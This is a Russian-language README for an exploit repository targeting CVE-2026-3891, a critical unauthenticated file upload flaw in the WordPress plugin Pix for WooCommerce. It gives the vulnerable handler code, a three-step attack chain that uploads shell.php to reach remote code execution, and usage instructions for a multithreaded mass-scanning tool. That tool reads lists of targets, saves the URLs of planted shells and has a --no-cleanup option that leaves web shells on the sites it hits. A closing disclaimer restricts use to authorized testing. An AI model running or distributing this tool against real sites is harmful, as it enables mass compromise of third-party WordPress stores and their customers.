
Pix for WooCommerce — Неаутентифицированная загрузка файла через параметр certificate_crt_path | CVSS 9.8
CVE-2026-3891 — это критическая (CVSS 9.8) уязвимость неавторизованной произвольной загрузки файлов в WordPress-плагине Pix for WooCommerce (от linknacional) версий ≤ 1.5.0.
Обработчик AJAX lkn_pix_for_woocommerce_c6_save_settings имеет:
certificate_crt_path принимается любое расширениеlkn_pix_for_woocommerce_generate_nonce без аутентификацииЗагруженные файлы попадают в веб-доступную директорию /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/.
| Версия | Статус |
|---|---|
| ≤ 1.5.0 | Уязвима |
| 1.6.0+ | Исправлена |
Обнаружил: Alexis Lafontaine через Wordfence (13 марта 2026)
// Nonce генерируется без аутентификации
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);
// Обработчик загрузки — нет проверки прав, нет проверки типа файла
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
function c6_save_settings() {
// Нет проверки current_user_can()
// Нет вызова wp_check_filetype()
move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
}
1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
→ Получить валидный nonce (аутентификация не требуется)
2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
→ Загрузить shell.php через поле certificate_crt_path
3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
→ RCE
git clone https://github.com/shinthink/CVE-2026-3891.git
cd CVE-2026-3891
pip install -r requirements.txt
python cve_2026_3891.py -t target.com
python cve_2026_3891.py -f targets.txt -o shells.txt
python cve_2026_3891.py -t target.com --debug --no-cleanup
-t, --target Одиночная цель
-f, --file Список целей
-o, --output Сохранить URL-адреса RCE
--threads Количество потоков (по умолчанию: 30)
--no-cleanup Оставить шеллы на цели
--debug Показывать каждый запрос
-v, --verbose Подробный вывод
ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И АВТОРИЗОВАННЫХ ТЕСТОВ. Авторы не несут ответственности за неправомерное использование.
| Ресурс | Ссылка |
|---|---|
| Уведомление Wordfence | wordfence.com |
| Запись NVD | CVE-2026-3891 |
| Исследователь | Alexis Lafontaine |
Не связано с linknacional или Pix for WooCommerce.